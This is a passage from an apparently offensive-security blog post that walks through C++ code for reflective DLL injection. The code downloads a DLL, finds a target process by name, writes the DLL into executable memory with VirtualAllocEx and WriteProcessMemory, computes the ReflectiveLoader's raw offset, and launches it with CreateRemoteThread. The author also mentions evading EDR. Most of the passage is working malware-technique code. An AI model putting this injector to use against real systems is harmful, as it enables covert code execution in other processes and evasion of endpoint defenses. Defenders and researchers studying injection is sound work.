    stream->Read(buffer.data() + buffer.size() - 100, 100, &bytesRead);
    if (0U == bytesRead)
    {
      break;
    }
    buffer.resize(buffer.size() + 100);
    totalbytes += bytesRead;
  };
  stream->Release();
  buffer.erase(buffer.begin() + totalbytes, buffer.end());
  return buffer;
}

There are different method that can be used to download a file, I haven’t tested any in terms of OPSEC, just used the one I knew. After that, we want to know the PID of the process we want to target to inject our Reflective DLL into

int RetrievePIDbyName(wchar_t* procName) {
    HANDLE hProcessSnap;
    PROCESSENTRY32 pe32;

    //to lower case the procname
    ToLowerCaseWIDE(procName);

    // Take a snapshot of all processes in the system.
    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) {
        std::cout << "[-] Unable to create snapshot of processes!" << std::endl;
        return 0;
    }

    // Set the size of the structure before using it.
    pe32.dwSize = sizeof(PROCESSENTRY32);

    // Retrieve information about the first process and exit if unsuccessful.
    if (!Process32First(hProcessSnap, &pe32)) {
        std::cout << "[-] Unable to retrieve information about the first process!" << std::endl;
        CloseHandle(hProcessSnap);
        return 0;
    }

    // Display information about all processes in the snapshot.
    do {

        ToLowerCaseWIDE(pe32.szExeFile);
        if (wcscmp((pe32.szExeFile), procName) == 0) {
            CloseHandle(hProcessSnap);
            return pe32.th32ProcessID;
        }

    } while (Process32Next(hProcessSnap, &pe32));

    // Close the snapshot handle to release resources.
    CloseHandle(hProcessSnap);
    return 0;
}

Here you can definitely work on the OPSEC side of things. But since bleeding-edge techniques to bypass EDR are not topic of this blog we move forward to open and handle to the remote process and inject our beloved DLL:

/*----------OPEN HANDLE TO REMOTE PROCESS PLEASE----------*/

HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
if (hProc == NULL) {
    cout << "[-] Error while opening the handle to process, exiting ... " << endl;
    return 1;
}
/*--------USEFUL FUNCTION TO ADD THE INFAMOUS HEADER-------------------*/
char * addHeaderToBuffer(PBYTE dll, size_t dllSize) {
    //I create a new buffer big as the dll + header
    char* newDll = new char[dllSize + HEADER_SIZE];
    //i write the dll HEADER_SIZE bytes forward so that i have the space for the header
    memmove(newDll + HEADER_SIZE, dll, dllSize);
    // Copy the header to the beginning of the dll buffer this time
    //since now i can overwrite those
    memcpy(newDll, HEADER, HEADER_SIZE);

    return newDll;
}
/*---------SOMEWHERE ELSE IN THE CODE WE DEFINE THE FUNCTION-----*/
PBYTE InjectDllRemoteProcess(int pid, size_t dllSize, PBYTE dllBuffer, HANDLE hProc) {
    size_t bytesWritten = 0;
    PBYTE dllBufferFinal = (PBYTE)addHeaderToBuffer(dllBuffer, dllSize);
    PBYTE dllDestination = (PBYTE)VirtualAllocEx(hProc, NULL, dllSize + HEADER_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (dllDestination == NULL) {
        cout << "[-] Error while allocating memory in remote process, exiting ... " << endl;
        return NULL;
    }
    //it's important to make some space also for the header
    if (WriteProcessMemory(hProc, dllDestination, dllBufferFinal, dllSize + HEADER_SIZE, &bytesWritten))
    {
        printf("[+] Successfully wrote DLL bytes + header at remote address: %p\n", dllDestination);
    }
    else {
        cout << "[-] Error while writing the DLL in the remote process, exiting ... " << endl;
        cerr << "[-] Win32 API Error: " + GetLastError() << endl;
        return NULL;
    }
    return dllDestination;

}

Cool, if we haven’t got any error it means our DLL is injected in the target process. We now need to find the pointer to the RAW bytes that are the start of our ReflectiveLoader function. This is because we want to create a thread in the remote process that runs the ReflectiveLoader function, and the DLL in the remote process is still in a “raw” state. A little problem arises here, in any of the sections we do not have a pointer to a relative raw address 😮 As we saw in the PE structure, there is a link to function/variables etc. once sections are mapped into virtual memory (RVAs) but not to RAW data.

Nonetheless, we can find what we want, which it would be basically a RRA (relative raw address). If you think about it, In the section headers we have a pointer to the beginning of the raw data, moreover we also know that the distance between the beginning of a section and the function we want to retrieve is the same in the RAW data as in the Virtual mapped memory. In fact, if you remember, that’s how we copy the data to virtual address:

//copying the RAW data in the desired VirtualAddress
  for (int i = 0; i < ImgFileHdr.NumberOfSections; i++) {
       custom_memcpy(
           (PVOID)(pebase + peSections[i]->VirtualAddress),// Destination
           (PVOID)(dllBaseAddress + peSections[i]->PointerToRawData),// Source
           peSections[i]->SizeOfRawData// Size
       );
   }

Therefore, a function can do the math for us:

DWORD Rva2Raw(DWORD rva, vector<PIMAGE_SECTION_HEADER> peSections, int numberOfSections) {
    for (int i = 0; i < numberOfSections; i++) {
        //sections might have different offset, so we need to find the one where our RVA is falling into
        if (rva >= peSections[i]->VirtualAddress && rva < (peSections[i]->VirtualAddress + peSections[i]->Misc.VirtualSize))
        {
            //so computing first the "distance" between the virtual beginning of the virtual section to the RVA
            //then adding that to the beginning of the same section but raw 
            return ((rva - peSections[i]->VirtualAddress) + peSections[i]->PointerToRawData);
        }
    }
    return NULL;
}

Back to our code flow, now we can find the “RRA” of the ReflectiveFunction:

/
LPVOID RetrieveLoaderPointer(PBYTE dllBase) {

    LPVOID exportedFuncAddrRVA = NULL;

    PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)dllBase; 
    if (pDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
        return NULL;
    }
    PIMAGE_NT_HEADERS pNtHeader = (PIMAGE_NT_HEADERS)(dllBase + pDosHeader->e_lfanew);
    if (pNtHeader->Signature != IMAGE_NT_SIGNATURE) {
        return NULL;
    }
    IMAGE_FILE_HEADER fileHeader = pNtHeader->FileHeader;
    IMAGE_OPTIONAL_HEADER optionalHeader = pNtHeader->OptionalHeader;

    vector<PIMAGE_SECTION_HEADER> peSections;

    for (int i = 0; i < fileHeader.NumberOfSections; i++) {
    
        //starting from the pointer to NT header + 4(signature) + 20(file header) + size of optional = pointer to first section header. 
        // to get to the next i multiply the index running through the number of sections multiplied by the size of section header 
        peSections.insert(peSections.begin(), (PIMAGE_SECTION_HEADER)(((PBYTE)pNtHeader) + 4 + 20 + fileHeader.SizeOfOptionalHeader + (i * IMAGE_SIZEOF_SECTION_HEADER)));
     
    }  
    //FROM HERE ONWARDS WE START PLAYING WITH RVA THEREFORE WE NEED TO FIND THE OFFSET IN RAW FILES
    //going throught the export directory to find the ReflectiveFunction we want to invoke
    PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)(dllBase + Rva2Raw(optionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress, peSections, (int)fileHeader.NumberOfSections));
    PDWORD FunctionNameArray = (PDWORD) (dllBase + Rva2Raw(pExportDirectory->AddressOfNames, peSections, (int)fileHeader.NumberOfSections));
    PDWORD FunctionAddressArray = (PDWORD) (dllBase + Rva2Raw(pExportDirectory->AddressOfFunctions, peSections, (int)fileHeader.NumberOfSections));
    PWORD  FunctionOrdinalArray = (PWORD) (dllBase + Rva2Raw(pExportDirectory->AddressOfNameOrdinals, peSections, (int)fileHeader.NumberOfSections));
    char* functionName = (CHAR*)(dllBase + Rva2Raw(*FunctionNameArray, peSections, (int)fileHeader.NumberOfSections));

    for (DWORD i = 0; i < pExportDirectory->NumberOfFunctions; i++) {       
        if (strcmp(functionName, EXPORTED_FUNC_NAME) == 0) {
            
            exportedFuncAddrRVA = (LPVOID) Rva2Raw(FunctionAddressArray[i], peSections, (int)fileHeader.NumberOfSections);
            break;
        }
    }
    return exportedFuncAddrRVA; 
}

Beautiful, now we have the RRA of the ReflectiveFunction, so in order to invoke it in the remote process we need to create a remote thread that takes code at that address as starting point. We also know the base address of the DLL in the remote process because that’s exactly the address returned by the VirtualAllocEx function!

/*--------CREATE REMOTE THREAD---------------------------------------*/

 //here we know the relative address of the ReflectiveFunction in the RAW data section
 //therefore we can invoke that function in the remote process. 
 DWORD threadId = 0x0;
 HANDLE hThread = NULL;
 //every RVA in the PE is SHIFTED BY THE HEADER SIZE I USE TO FIND THE DLL IN MEMORY EGG 
 hThread = CreateRemoteThread(hProc,NULL, 0, (LPTHREAD_START_ROUTINE)(remotePEBase + (DWORD)reflectiveLoaderFunc + HEADER_SIZE), NULL, 0 , &threadId);
 if (hThread == NULL) {
     cout << "[-] Error while running the remote thread, exiting ... \n";
 }
 else {
     printf("[+] Successufully ran thread with id: %lu\n", threadId);
 }

Something to keep in mind if you haven’t noticed in the code is that since we wrote an header before the DLL, all the addresses we want to refer to in the remote allocated memory, are shifted of HEADER_SIZE 😇

Results

Untitled

References

Some useful ones:

Credits

What I have found really useful during this journey:

  • MaldevAcademy course, and community
  • 0xRick blog, top resource
  • Colleagues that listen to my rants on the way to lunch, and those who like to go on a sabbatical 💞